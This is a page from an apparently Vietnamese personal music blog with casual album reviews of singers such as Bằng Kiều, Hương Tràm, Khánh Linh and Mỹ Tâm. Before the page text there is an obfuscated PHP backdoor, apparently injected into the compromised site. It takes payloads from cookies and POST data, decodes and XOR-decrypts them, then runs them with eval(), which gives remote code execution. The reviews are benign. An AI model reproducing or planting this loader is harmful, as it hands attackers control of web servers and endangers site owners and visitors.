$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> nhạc-nhẽo – Page 4 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: nhạc-nhẽo (page 4 of 5)

Bằng Kiều & Trần Thu Hà – Đánh thức tầm xuân

Ngoài cửa sổ mưa rỉ rả nhưng mây trời trong vắt, nắng lại vàng chứa chan đột nhiên khiến tôi thừ người ra. Trời Texas làm tôi nhớ Sài Gòn – Sài Gòn của những ngày chợt mưa chợt nắng, nắng chưa tan mà mưa đã ào ạt tới. Ngồi nhìn đồng hồ, còn tận một tiếng nữa mới đến giờ đi xem phim – một mình, tôi chạy vào nhà bếp công ty, pha vội cho mình một li Mochaccino. Vừa tựa người bên cửa sổ nhìn mưa, nhấp cà phê, uể oải trả lời sếp: tao đang suy nghĩ về project, vừa với tay lật tung kho nhạc tìm một album nghe cho hợp, cuối cùng dừng ở album này.

Tôi không thích Bằng Kiều lắm, tôi cũng nghĩ “Đánh thức tầm xuân” không phải là album hay nhất của Hà Trần, nhưng tôi nghe trong album này có những điều rất riêng, của cả Bằng Kiều, của cả Hà Trần, của cả giọng hát hai người kết hợp – và đặc biệt hơn nữa, album này cũng là bước tiến quan trọng để góp phần khẳng định tên tuổi của Bằng Kiều, cũng như giúp Hà Trần tạo được tiếng vang lớn.

Giống như trong hai album trước với Mỹ Linh và Phương Thanh, Bằng Kiều cùng Hà Trần đã có bản song ca “Đánh thức tầm xuân” mà sau này vẫn chưa có cặp song ca nào hát hay đến mức đó (đâu gần đây, diva rất có duyên với nhạc Dương Thụ là Hồng Nhung có cùng Quang Dũng trình bày bài này, nhưng cũng chỉ dừng ở mức đạt), và bài “Về với anh” (Bảo Chấn sáng tác). Tuy nhiên, khác ở chỗ album này những bài còn lại lần lượt là các khúc hát solo của Bằng Kiều và Hà Trần.

Bằng Kiều thuở đó giọng vẫn cao nhưng không được anh cố tình đẩy lên mức cao vút hết sức khó chịu như cách anh vẫn khoe giọng trong hầu hết các ca khúc của anh vài năm trở lại đây. Bằng Kiều trong các ca khúc, dù hát song ca, hay hát đơn, vẫn là giọng kĩ thuật nhưng không đến mức quá phô trương. Trong album này còn có bài do Bằng Kiều sáng tác “Hè muộn” – một trong những bài hát để đời và gắn với tên tuổi của Bằng Kiều. Thật ra, nói ngoài lề, tôi thấy anh Kiều hát bài “Cửa sổ mùa đông” hay cực, chả hiểu sao không được nhiều người để ý đến. Có lẽ họ chuộng version của Hồng Nhung hơn. Cứ nghe tới khúc anh Kiều thủ thỉ “để rồi mãi nỗi buồn ngày mưa”, và “mưa bay đi và câu tình ca vẫn chỉ buồn như thế”, nhìn ra cửa sổ lại thấy tê lòng.

Như đã nói, các bài của Hà Trần trong album này không phải những bài tôi (và cũng như nhiều người) đánh giá là hay nhất, nhưng là mốc điểm quan trọng với Hà Trần. Đây là lúc Hà Trần bước chân vào làng ca hát chuyên nghiệp sau khi đã đạt vô vàn giải thưởng ca hát khác nhau. Nghe hai bài Hà Trần hát chung với Bằng Kiều trong album này thì thấy, cô không khoe giọng của mình một cách mạnh mẽ như Mỹ Linh hay Phương Thanh khi hát cùng Bằng Kiều, mà chọn cách hát thật giản dị, nhẹ nhàng, lúc như hòa quyện vào, lúc lại vượt trội lên – nhưng chỉ hơi hơi vừa đủ. Đến những bài hát đơn của cô trong album này cũng thế. Trừ bài “Tóc gió thôi bay” ra, sau này không có bài nào hay đặc biệt đến mức trở thành thương hiệu của riêng cô, nhưng tất cả các bài cô hát đều rất chỉn chu, mẫu mực. Cô duyên những chỗ cần duyên, nhẹ nhàng những chỗ nhẹ nhàng, phiêu những chỗ nên phiêu. Một khởi đầu rất đẹp cho một ca sĩ – không có ngoại hình bắt mắt hay giọng hát đặc biệt như cô.

Một album không xuất sắc, nhưng là một album quan trọng trong cuộc đời nghệ thuật của hai ngôi sao nhạc nhẹ đương đại Việt Nam. Một chút gì đó ngây ngô, một chút gì đó lãng đãng, chút giản dị, chút nồng say… tưởng thế là quá đủ cho một ngày mưa đầy nhớ thế này.

Văn Mai Hương – 18+

Khá trùng hợp ngay khi hôm qua mình vừa nghe mini album đầu tay của quán quân Giọng Hát Việt là Hương Tràm, thì hôm nay đã lại thấy có album của á quân Việt Nam Idol Văn Mai Hương trên zing mp3. Dù vô tình hay có ý, thì ít nhiều mình (hay người nghe khác) cũng có chút so sánh giữa hai giọng ca đã một phần khẳng định được tài năng nhưng còn khá trẻ này.

Cả Tràm lẫn Hương đều sở hữu giọng hát đầy nội lực, những giọng hát cuốn hút mà không cần kĩ thuật thanh nhạc rất nhiều, những giọng hát mà khi vừa cất lên đã có thể khiến người nghe xuýt xoa vì thích thú. Cả hai đều đi theo con đường khá ‘cơ bản’: đoạt giải trong các cuộc thi âm nhạc (truyền hình) có tiếng, đến phát hành single riêng, và rồi tung ra (mini) album. Chưa biết ê-kíp đứng sau Tràm là ai, nhưng ê-kíp của Hương khá bài bản, cả về truyền thông lẫn nghệ thuật.

Mình thích Văn Mai Hương hơn Uyên Linh, vì chất giọng trong trẻo nhưng đầy cá tính của cô bé, và vì cách cô bé hát, đẹp và sôi nổi như tuổi trẻ của cô. Mình không biết sao ê-kíp của Hương lại chọn cho cô bé đi khác cái phong cách dance và RnB vốn rất hợp và cuốn hút của cô trong ‘Nếu như anh đến’. Theo mình đó là một bước đi khá vội.

Văn Mai Hương của “Mười tám +”, đúng như tên album và định hướng của Huy Tuấn, là một Văn Mai Hương đầy chín chắn. Đúng là tông nhạc của album vẫn rất hiện đại, sạch sẽ và tươi mới, nhưng mình vẫn thấy nhớ nhớ Hương của thời mới đoạt á quân Idol hơn. Người nghệ sĩ là luôn phải làm mới mình, cũng có thể Hương vẫn đang gắng định hình phong cách phù hợp, nhưng thật ra Hương vẫn chưa ‘xài-hết’ cái tiềm năng của sự kết hợp ‘tuổi trẻ – sôi nổi’ mà.

Quay lại “Mười tám +” của Văn Mai Hương đẹp, đẹp vì những album do Huy Tuấn sản xuất có album nào không đẹp? Và Huy Tuấn có quá đủ kinh nghiệm làm album đầy tính chuyên môn nghệ thuật nhưng vẫn đảm bảo có sức hút trên thị trường. Nhưng Văn Mai Hương chưa đạt đến tầm của Mỹ Linh, nên cái đẹp của “Mười tám +” là một cái đẹp rất tròn trịa, đến mức thiếu điểm nhấn. Giữa những bài ballad nhẹ nhàng, Văn Mai Hương có xen vào một vài bài nhạc sôi động, như bài Tango lúc kết thúc, nhưng đó vẫn chưa hoàn toàn tạo thành điểm nhấn. Như mình đã nói ở trên, các ca khúc được xem là chủ lực trong album như ‘Chậm lại một phút’, ‘Riêng mình anh thôi’ hay ‘Giấc mơ thức tỉnh’ vẫn còn thiếu gì đó để người ta nghe mãi, nhắc mãi và sẽ nhớ, ít nhất là như ‘Nếu như anh đến’ ngày nào.

Hoàn toàn rất tốt cho album của một ca sĩ trẻ, Văn Mai Hương còn có rất nhiều thời gian. Hương hoàn toàn đủ khả năng để đạt đến thành công như Mỹ Tâm hiện tại, nhưng để phát huy hoàn toàn nội lực của cô, có thể tiến xa hơn nữa, thì còn rất nhiều yếu tố. Hi vọng vào những điều tốt đẹp nhất trong tương lai cho cô bé :”).

Hương Tràm – Với em là mãi mãi

Mini album mới nhất của Hương Tràm – quán quân Giọng Hát Việt mùa đầu tiên.

Album này nằm trên trang chủ của Zing và nhaccuatui cả mấy tuần nay. Với một thằng ngày nào cũng phải vào Zing để nghe các oppa hát như mình thì thấy album này ngứa mắt lắm. Chắc một phần do mình ghét kiểu mini album, tung ra một album có 3 bài thì tung ra làm giè, nghe chẳng đã tai gì hết. Vì lẽ đó tới hôm nay, nhân dịp phải lái xe đi công chuyện, cần tìm gì đó để nghe trong vòng 20′, mình mới nghe qua album này.

Album có 3 bài: Với em là mãi mãi, Trăng dưới chân mình và Ngại ngùng, theo đúng thứ tự. Nhiều người thích thú và quan tâm ca khúc đầu tiên và ca khúc cuối cùng, vì chúng nổi hơn. “Ngại ngùng” từng đoạt giải-gì-đó và thu hút được nhiều chú ý vài tháng gần đây, trong khi đó “Với em là mãi mãi” hay được báo chí thổi phồng lên như một trong những bản pop ballad đẹp ơi nà đẹp mà nhạc sĩ Hồ Hoài Anh viết riêng và để cho Hương Tràm hát độc quyền. Nghe oách nhỉ?

Tuy nhiên, ca khúc mình muốn nghe đầu tiên là “Trăng dưới chân mình” của Trần Lê Quỳnh.

“Trăng dưới chân mình” giống như các ca khúc khác của Trần Lê Quỳnh: đẹp, thắm thiết và bình dị. Tuy nhiên, không hiểu sao “Trăng dưới chân mình” không nổi bằng các ca khúc khác của anh. Mình nghe “Trăng dưới chân mình” và ấn tượng bởi giọng hát của Ngọc Anh (trong album Đóa hoa nở muộn – chẹp, có thời gian chắc cũng sẽ viết cảm nhận ngắn) – một trong những giọng ca nữ rất đẹp, và gần đây là ở Paris By Night 106, Thu Phương trình bày cũng đạt.

Mình thích Hương Tràm hát bài “Trăng dưới chân mình” lắm. Mình cũng ngạc nhiên là sao Hương Tràm chọn ‘Với em là mãi mãi’ làm tên album, hay chọn bài ‘Ngại ngùng’ như là át chủ bài mà không chọn ‘Trăng dưới chân mình’. Bài này Thu Phương hát đạt, Ngọc Anh hát hoàn hảo, còn Hương Tràm hát hay kinh hoàng.

Nghe đi nghe lại, vẫn cứ tới câu

Tưởng như em gặp lại anh, trong đêm xanh, nép vào vai anh nghe tiếng anh cười.

và cái chất giọng nghẹn nhẹ khi Hương Tràm hát

Ở một thế giới thật xa, em mơ mình có anh.

là lại thấy thích không tả nổi

Lệ Quyên – nữ hoàng nhạc nhẹ

Ngày nay, nếu tìm kiếm từ “Lệ Quyên” trên các trang tìm kiếm trong và ngoài nước, chắc đến 90% kết quả trả về thông tin về nữ ca sĩ trẻ Lệ Quyên – người rất thành công vào những năm gần đây với hàng loạt album nhạc nhẹ, nhạc xưa, đặc biệt là album “Giấc mơ có thật”. Có rất nhiều bạn trẻ cho rằng, ca sĩ trẻ Lệ Quyên hiện là một trong những cái tên sáng giá đầy tiềm năng để có thể trở thành một diva sau lứa các diva Thanh Lam, Mỹ Linh, Hà Trần và Hồng Nhung. Tuy nhiên, có lẽ ít ai nhớ rằng, đã từng có một ca sĩ, cũng có tên Lệ Quyên, vào hơn 30 năm trước đã được gọi là “Nữ hoàng nhạc nhẹ”, là người được nhạc sĩ Dương Thụ nhận xét “Mỗi người có một thời của mình. Thời ấy, Lệ Quyên là diva duy nhất”. Và nhạc sĩ Nguyễn Cường đến giờ vẫn khẳng định: “Lệ Quyên là dấu ấn không ai lặp lại được”.

Vào tầm những năm 80, có lẽ không ai không nghe đến những cái tên như Vũ Dậu, Ái Vân, Cẩm Vân và Lệ Quyên… Tạm không nói về Vũ Dậu, vì những bài hát của cô đa phần đều là nhạc đỏ. Về nhạc nhẹ, thì có thể nói không ngoa rằng Ái Vân và Lệ Quyên thống trị làng ca nhạc thời đó. Vũ Dậu, Ái Vân và Lệ Quyên thường được đại diện các ca sĩ ‘nước nhà’ đi chinh chiến quê người, chủ yếu là các nước thuộc khối Xã hội chủ nghĩa Đông Âu. Như trong số hiếm các ‘vi-déo’ còn sót lại trên mạng, chúng ta thấy có:

– Ái Vân hát tại Mạc Tư Khoa năm 1982 bài “Như có Bác Hồ trong ngày vui đại thắng” http://www.youtube.com/watch?v=XFka6UIVt_Y
– Vũ Dậu và Lệ Quyên biểu diễn tại liên hoan âm nhạc Télévariété, Tiệp Khắc năm 1982 bài “Gửi lại em” http://www.youtube.com/watch?v=JeCobArSCXE

Lại quay về Lệ Quyên, có lẽ ít người biết là những sáng tác thời buổi đầu góp phần giúp nhạc sĩ Dương Thụ nổi tiếng là do Lệ Quyên trình bày. Thậm chí có những ca khúc như “Họa mi hót trong mưa”, “Tiếng sóng”, là Dương Thụ sáng tác riêng tặng Lệ Quyên.

Dương Thụ cũng từng phát biểu trong một cuốn sách của mình “Không có Lệ Quyên thì không có Dương Thụ”. Chính nhờ bài “Hơi thở mùa xuân” do Lệ Quyên trình bày, nhạc sĩ Quang Vinh (nay là giám đốc Nhà hát Ca múa nhạc Việt Nam) phối khí, nghệ sĩ Tôn Thất Chiêm đệm piano đoạt giải ở “Liên hoan Giọng hát hay toàn quốc”, nhiều người mới biết đến cái tên Dương Thụ hơn. Sau đó Dương Thụ và Lệ Quyên tiếp tục hợp tác đưa những bản như “Họa mi hót trong mưa”, “Tiếng sóng biển”, “Bay vào ngày xanh”… thành hit.

(có một điều khá trùng hợp “Họa mi hót trong mưa” cũng là ca khúc giúp Khánh Linh, con gái của NSƯT Vũ Dậu gần đây gầy dựng được tên tuổi).

Đang trên đỉnh thành công, Lệ Quyên theo chồng sang Pháp, và từ đó sự nghiệp ca hát của cô dần dần bị lãng quên vì không tìm được đất diễn.

——————–

Người ta nói có hai bài của Dương Thụ mà Lệ Quyên trình bày hay nhất, đó là bài “Tiếng sóng biển” và bài “Họa mi hót trong mưa”. Bài “Tiếng sóng biển” (bản thu vào những năm 80) có thể nghe ở đây: http://www.youtube.com/watch?v=o1gMSKSC2qU, chỉ tiếc bản “Họa mi hót trong mưa” do Quang Minh hòa âm giờ không biết kiếm ở đâu.

Năm 2007, Lệ Quyên có trở lại sau một thời gian dài và tung ra album “Có lẽ nào anh lại quên”. Trong album này, cô hát những bài quen thuộc và gắn liến với tên tuổi cô: từ bài “Hơi thở mùa xuân” đưa cô đoạt giải A liên hoan, đến bài “Tiếng sóng biển”, “Họa mi hót trong mưa” hay “Hoa sữa” một thuở.

Album này, mình nghe qua bài “Tiếng sóng biển” và so sánh với bản thu những năm 80, thấy vẫn ít nhiều giữ được chất giọng của Lệ Quyên (dù dĩ nhiên, vẫn không bằng những ngày tháng cũ), nên tạm chấp nhận được rằng mình đang nghe diva Lệ Quyên thuở nào.

Không phải so sánh diva những năm 80 và các diva thời điểm hiện tại, hoặc là do giọng ca thu âm vào năm 2007 không thể bằng giọng hát của cô vào thời đỉnh cao, nhưng những bài trong album này, thú thật mình nghe lần đầu qua giọng hát của những Mỹ Linh (Trên đỉnh phù vân), Thanh Lam (Hoa sữa), Họa mi hót trong mưa (Hồng Nhung)… nên mình quen thuộc với giọng ca của các nữ ca sĩ ấy hơn. Tuy nhiên, nếu thử đem bài đầu tiên “Hơi thở mùa xuân” – bài từng được cả ba giọng ca: Thanh Lam, Mỹ Linh, Hồng Nhung trình bày, thì bản của Lệ Quyên vẫn có những nét rất riêng, không lẫn vào đâu được, đặc biệt là có những câu, những chữ cô hát và luyến luyến rất “đắt”, đó là những điểm sáng khiến mình thích ca khúc này.

Nhìn chung, đây là một album, với mình là nghe được, nhất là nghĩ về những câu chuyện ngoài lề nhưng không kém phần quan trọng tạo nên ca khúc – nghĩ đến mối tình đơn phương của chàng nhạc sĩ tặng cho nữ hoàng nhạc nhẹ vào thời điểm đó…

Khánh Linh – Giấc mơ mang tên mình

Ngay khi album này vừa ra, bạn đã hỏi mình nghe chưa, review xíu đi. Thật ra mình không thể nào là tay viết review nhạc được, vì cách mình nghe nhạc rất đồng bóng và đầy cảm xúc, nhiều khi thích hay không thích chỉ vì những lí do hoàn toàn cá nhân. Quay lại, album phát hành cuối tháng 5 nhưng mãi đến hôm nay mp3.zing.vn mới đăng lên, vì vậy mình mới nghe được. Nghe xong viết vội ngắn gọn vài dòng vậy.

Đây là thời điểm ất ơ của nhạc Việt, khi mà thật sự các album chất lượng xuất hiện rất ít, và bị che lấp trong mớ các album chẳng đâu ra đâu nhưng được phủ cái lớp ngoài hào nhoáng nhờ các yếu tố ngoài-âm-nhạc. Những album nghe chất lượng ít, ít đến thảm thương. Cũng may thay, đúng như mong đợi từ trước khi nghe của mình: Giấc mơ mang tên mình của Khánh Linh là một album chất lượng.

Mình từng nói nhiều lần, dù nói chả ai nghe, cứ sau một thời gian là nền nhạc Việt lại xuất hiện một lứa các ca sĩ tài năng, để lại dấu ấn sâu đậm trong lòng thính giả, và có khả năng trở thành diva. Sau lứa diva Thanh Lam, Hà Trần, Mỹ Linh, Hồng Nhung, nhạc Việt không phải chờ lâu khi xuất hiện lứa các giọng ca nữ sinh vào khoảng tầm năm 80 81. Mình có thể liệt kê ra đây 4 giọng ca theo mình là sáng giá nhất: Nguyên Thảo, Khánh Linh, Ngọc Hạ và Lệ Quyên.

Ngoài cái tên Lệ Quyên vẫn còn khá gượng, theo mình ba cái tên còn lại hoàn toàn đủ khả năng sau này sẽ trở thành những tên tuổi được các thế hệ sau ghi nhớ. Tuy nhiên, thật không may khi có vẻ cả ba đều thiếu một thứ gì đó. Ở đây mình nói về Khánh Linh.

Mình nghe Khánh Linh đầu tiên là ở bài, dĩ nhiên, nổi tiếng nhất của cô: “Họa mi hót trong mưa” và yêu ngay tiếng hát cô từ đó. Có thể biết một ca sĩ có chỗ đứng thế nào trong lòng thính giả chỉ bằng một việc nho nhỏ: sau bao nhiêu năm không ra album, ca sĩ đó vẫn được yêu thích và đánh giá cao về tài năng? Với Khánh Linh là 6 năm.

6 năm trong làng nhạc, bảo dài thì không phải dài, nhưng cũng không ngắn, đủ để sự yêu mến của thính giả phai dần, nhất là ở những ca sĩ trẻ. Nhưng đâu đó, khi nói về Khánh Linh, người ta vẫn bảo: Linh hát hay lắm, và khi Khánh Linh ra album, vẫn nghĩ rằng: chắc chắn là album phải hay rồi, Linh hát mà. Ca sĩ có được điều đó, là một ca sĩ tài năng.

Quay lại, nếu nhìn vào tracklist trong album, người nghe sẽ rất ngạc nhiên khi trong đó là một sự hổ lốn đầy phong cách: có những bài semi-classic quen thuộc của Linh đó tới giờ, có bài sến kiểu thị dân của Trịnh, có bài sến một cách ‘rẻ’ như người ta hay cười nhạc vàng. Nhưng nghe kĩ mới biết, bài nào cũng được phối lại để vút lên cái giọng hát cao đến ngỡ ngàng nhưng không buốt thẳng vào óc như giọng kim của nữ danh ca Thái Thanh thuở nào, mà trong trẻo đầy tinh tế và cảm xúc đến lạ. Khánh Linh sau 6 năm, nghe nhiều hơn sẽ thấy xuyên suốt còn có sự ngẫu hứng. Ngẫu hứng một cách tự nhiên, như thể tới khúc đó, tới câu đó, tới nốt nhạc đó lẽ tất dĩ ngẫu cần phải ngẫu hứng vậy.

Tên của album “Giấc mơ mang tên mình” cũng là tên bài hát mà mình mong đợi nhất. Đơn giản, trước đó có giọng ca Thùy Chi – một giọng nữ cũng cao vút hiếm hoi, và đặc biệt là Nguyên Thảo trình bày. Chả phải mình cũng từng phân vân xem “Họa mi hót trong mưa” Nguyên Thảo và Khánh Linh ai hát hay hơn đó sao? Và cũng như bài hát đó, ở bài “Giấc mơ mang tên mình”, Nguyên Thảo trình bày đầy nội lực và thiết tha, trong khi Khánh Linh thì trong veo đến lạ. Mình thích bản của Nguyên Thảo hơn cho đến 80 hay 90% bài hát, nhưng phút cuối, Linh ngẫu hứng tuyệt vời quá, khiến mình quay qua yêu bản này ngay.

Lại nói về cái ngẫu hứng của Linh trong album này, cứ thử mà nghe “Chiều một mình qua phố” xem? Ban đầu sẽ thấy lạ, vì đó không phải giọng trầm đầy biểu cảm của những danh ca đã gắn liền với bài đó như chú Tuấn Ngọc hay cô Khánh Ly. Nghe Linh hát, tưởng tượng như thấy cảnh một cô gái vừa đi vừa hát trong chiều, có cả nỗi buồn và sự cô đơn, nhưng cũng có những nét ngẫu hứng nghịch ngợm rất lạ. Hate it or like it, chắc là tùy vào cảm nhận của mỗi người, nhưng mình là mình thích thích lắm. Cũng như thế cho hai bài vốn rất quên thuộc “Người tình trăm năm” và “Phút cuối”.

Một bài nữa mà mình thích là bài “Giọt sương mai” với tiếng đàn tranh. Khi tiếng đàn và giọng ca của Linh vang lên, cứ tưởng đang xem một bộ phim cũ kĩ nào đó của Vương Gia Vệ – mình không rành xem phim, nên chỉ liên tưởng đến đây là không biết phải diễn tả sao. Một nét Trung Hoa và thơ đặc quánh.

Mình định khen album của Linh giống hai album không-thể-hay-hơn của Hà Trần khi mới bắt đầu hát, nhưng thấy không cần thiết, vì cả hai đều là những nét tính cách trong giọng hát rất đặc biệt, và vì mình đều yêu thích cả hai…

Các Album review ngắn khác

Thật ra, không nhờ mấy vụ lùm xùm quanh em Tưng thì mình chắc cũng chả biết Lam Trường ra album mới. Rất chán khi phải bắt đầu bằng Once upon a time he he, nhưng quả thật là đã có một thời mình chửi nhau với cả gái (việc lúc đó mình xem là đại nghịch bất đạo) về việc Lam Trường nhất định là hát hay hơn cái tay tóc bổ luống hai mái ẽo à ẽo ọt cùng tên.

Cơ mà, để nói về album này, mình nghĩ dùng: Once upon a time vẫn rất hợp. Giọng Lam Trường vẫn như anh Hai của ngày xưa, từ cái thời ảnh mặt này non choẹt đại phá Làn Sóng Xanh với những hit như Mưa phi trường, Gót hồng, Tôi ngàn năm đợi… nhưng hoàn cảnh bây giờ không như vậy. Ngày đó, nhạc trẻ Việt Nam và cơn lốc Làn Sóng Xanh mới lạ dẫn đến lan tỏa trong giới trẻ như cơn bão, những bài nhạc trẻ pop như vầy dễ lên ngôi. 15 năm đã trôi qua, tới thời điểm hiện tại, mỗi tháng cũng phải tầm 5, 7 ca sĩ tung ra album nhạc trẻ, hằng ngày vô vàn bài tự hát, tự sáng tác được tung lên mp3 zing, nhaccuatui hay youtube, anh Hai vẫn là anh Hai của ngày xưa, nhưng nhạc anh đã không còn thu hút. 10 ca khúc trong album của anh vẫn là những ca khúc Pop, Pop Ballad, vẫn dễ nghe, nhưng trong giai đoạn bội thực các bài hát kiểu thế thì không ai có hứng thuộc.

Lam Trường làm việc mà anh làm rất đạt trong hơn chục năm qua, nhẹ nhàng, tình cảm, vẫn khiến người ta mỉm cười nhẹ, nhưng cái bóng quá lớn của quá khứ đã không thể khiến anh đạt được tiếng vang cho dù anh có ra bao album mới. (1)

Trong album này, bài mình thấy hay nhất là bài Xin Em Đừng Đi, mình chỉ thắc mắc là sao Lam Trường không phát hành mỗi bài này thôi, quay clip này nọ và viral để lên top các bảng xếp hạng Zing, nhaccuatui, sau đấy tung ra album sau. Vì bài này mình nghĩ là bài dạng có thể cứu cả album.

 

 

Phương Linh – Tiếng hót từ bụi mận gai

Phương Linh - Tiếng hót từ bụi mận gai

Phương Linh – Tiếng hót từ bụi mận gai

Nhiều ca sĩ tên Linh quá, cứ lẫn lộn cả lên. Bạn này trùng tên với mối tình đơn phương cô gái Sài Gòn đầu tiên của mình, đến giờ qua hơn 11 năm mình vẫn nhớ số điện thoại nhà bản í. À, lạc đề.

Cái tên album “Tiếng hót từ bụi mận gai” thu hút sự chú ý của mình trước tiên, đơn giản nó lấy ý từ một trong những tác phẩm mình thích nhất của Colleen McCullough. Xem qua track list thì thấy Phương Linh quá liều lĩnh, khi những tác phẩm mà cô chọn, không phải hoàn toàn là những bài thuộc dạng cây đa cây đề đi vào lòng người nghe nhạc, nhưng cũng toàn mấy bài đã rất nổi, nhiều bài thuộc loại gần như ‘hàng tủ’ của một vài ca sĩ nào đó.

Điển hình như bài ‘Họa mi hót trong mưa’ của Dương Thụ, trước đó cả Hồng Nhung, Khánh Linh và gần đây là Nguyên Thảo đều thể hiện không thể nào tốt hơn được xíu nào nữa, nhưng cả 3 bản này đều có cá tính riêng đặc sắc của mỗi người. Phương Linh liệu hát lại bản này hay hay không đã là một vấn đề, nói gì phải nhét được cái chất riêng của mình vào?

Thôi tóm gọn lại, phải test chương trình nữa, công ty không có tester khổ thế đấy, tự code tự design tự test tự báo cáo luôn, album này đáng nghe, dù có thể là không hay hoàn hảo. Giọng của Phương Linh giờ có cái chất riêng: lạnh. Cái chất ‘lạnh’ đó, cùng sự hòa âm của Thanh Phương (anh này hồi đó ở trong band Phương Đông – cái band này cũng thường thôi, các thành viên cũng chỉ có Quốc Trung, Quốc Hưng, Trần Mạnh Tuấn… sau đều rất thành danh đấy thôi í mà, sau thì ‘làm’ một loạt cái bài hay cho Thanh Lam, Hà Trần… – nói để khen album này hòa âm hay thôi).

Mỹ Tâm – Vol 08 – Tâm

Mỹ Tâm - Vol 08 - Tâm

Mỹ Tâm – Vol 08 – Tâm

Mỹ Tâm – Vol 08 – Tâm

Sau cái album Mỹ Tâm hát nhạc xưa lời sai toe toét thì mình cũng không kì vọng gì vào mấy album sau của Mỹ Tâm nữa. Theo mình cái album Nhạc Xưa đó là một trong những cơ hội tốt để Tâm bứt phá hoàn toàn, lên là lên là lên là lên luôn đó, tiếc là Tâm không làm được.

Mình cảm giác cái thời đỉnh cao của Tâm đã qua rồi, tất cả những bài sau này của Tâm, như là mấy bài trong album này, mình nghe chả khác gì Hải Băng, Khởi My hay Noo Phước Thịnh. Mình nghĩ như Tâm cũng buồn (dù mình chắc là Tâm chả cần mình buồn giùm), Tâm đang đứng ở đỉnh cao của showbiz, nhưng muốn vươn lên tới hàng 4 diva của làng nhạc Việt thì còn xa vời vợi, thậm chí giờ so với một số các ca sĩ trẻ trẻ hơn chắc cũng khó có thể bằng nữa rồi.

Tâm có thể không cần hát nhạc xưa. Không phải chỉ hát nhạc xưa mới nổi. Nhưng Tâm nên chọn những bài khác, hơn là (hầu hết) mấy bài nghe rồi quên ngay thế này. Như Hà Trần hay Mỹ Linh đấy, đâu hát nhạc xưa lắm đâu, mà nghe vẫn thấy hay, vẫn nhớ mãi.

Nếu mà Tâm không có được một album nào thật là hay vượt trội thì rồi sợ sẽ như một Phương Thanh đình đám một thời, rồi dần dần tàn. Cơ mà mình cũng chả quan tâm lắm, mình cũng vẫn thích Mỹ Tâm như một thời thích mấy bài Tóc nâu môi trầm, Hát với dòng sông… (cũng như vẫn mãi thích Phương Thanh) vì đã gắn với một thời mải mê chinh chiến và yêu đương của mình

Đức Tuấn – Bài tình ca đêm

Đức Tuấn - Bài tình ca đêm

Đức Tuấn – Bài tình ca đêm

Trong số các ca sĩ trẻ Việt Nam hiện tại thì mình có cảm tình với Đức Tuấn nhất. Có lẽ bắt đầu từ lí do cực kì đơn giản Tuấn là cựu học sinh trường cấp 3 của mình, và mình chả nhớ năm nào, Tuấn có về trường hát, và hát “mộc” bài Ngày Xưa Hoàng Thị rất hay.

Thời điểm đó và cả sau này, Tuấn nổi lên như một trong những ca sĩ trẻ trình bày nhạc Phạm Duy đạt. Đạt ở đây là không trở thành “thương hiệu” cho mình, nghe không thể khiến người ta nhớ mãi (trừ, ừ, một hai bài), nhưng cũng khó để người nghe chê trách điều gì (ngoài cái nhỏ nhặt là điệu đà, tỉ mỉ quá).

Đức Tuấn sau này thử mình với khá nhiều ca khúc của các nhạc sĩ khác – như một thời của Phạm Đình Chương mà mình không có ấn tượng lắm. Các album Phạm Duy sau của Tuấn như Kỷ Niệm, Kiếp nào có yêu nhau… mình cũng thấy bình thường.

Mình thích Tuấn đặc biệt ở album “Trẻ mãi”, Tuấn hát nhạc phẩm của Trần Lê Quỳnh phát hành đâu năm 2009 2010. Mình thấy thể loại đó hợp với Tuấn hơn. Tuấn hát những bài nhẹ nhàng, trong trẻo như ngày đó hát Ngày xưa Hoàng Thị, hay những bài tự sự xíu nhưng không đến mức tràn đầy tâm sự, đau thương… thì hay, nghe hợp lắm.

Vì vậy, mình đang nghe album này của Đức Tuấn, và thấy thích. Các ca sĩ trẻ cũng nên hát mấy bài hát thế này, chứ cứ đâm đầu vào mấy cụ Trịnh Công Sơn, Phạm Duy, Từ Công Phụng, Ngô Thuỵ Miên… làm chi?

Quang Dũng – Tình ca Phạm Duy

Quang Dũng - Tình ca Phạm Duy

Quang Dũng – Tình ca Phạm Duy

Quang Dũng rất giống Tuấn Ngọc ở chỗ cả hai anh đều như một cái máy hát, thể loại nào, nhạc của nhạc sĩ nào cũng hát. Tuy nhiên, Quang Dũng khác Tuấn Ngọc ở chỗ anh ấy hát (hầu như) nhạc ai nghe cũng rất chán.

Sau một hồi chạy từ Trịnh Công Sơn sang Diệu Hương, lẽ tất dĩ ngẫu anh Dũng cũng dừng lại ở dòng nhạc Phạm Duy. Đĩa này được hoà âm phối khí bởi hàng loạt tên tuổi lớn, nghe được hơn so với các album cũ của anh ấy, nhưng thú thật là nghe vẫn rất chán.

Quang Dũng hát cứ đều đều, hát những bài trong trẻo không có được cái trong trẻo nhẹ nhàng như Đức Tuấn ngày xưa khi hát “Ngày xưa Hoàng Thị”, hoặc ở một số bài “khó” thì không có được cái day dứt nghẹo ngào đến xót xa như Nguyên Thảo. Nghe Quang Dũng hát “gắng” ở một số bài như Nha Trang Ngày Về nghe rất mệt.

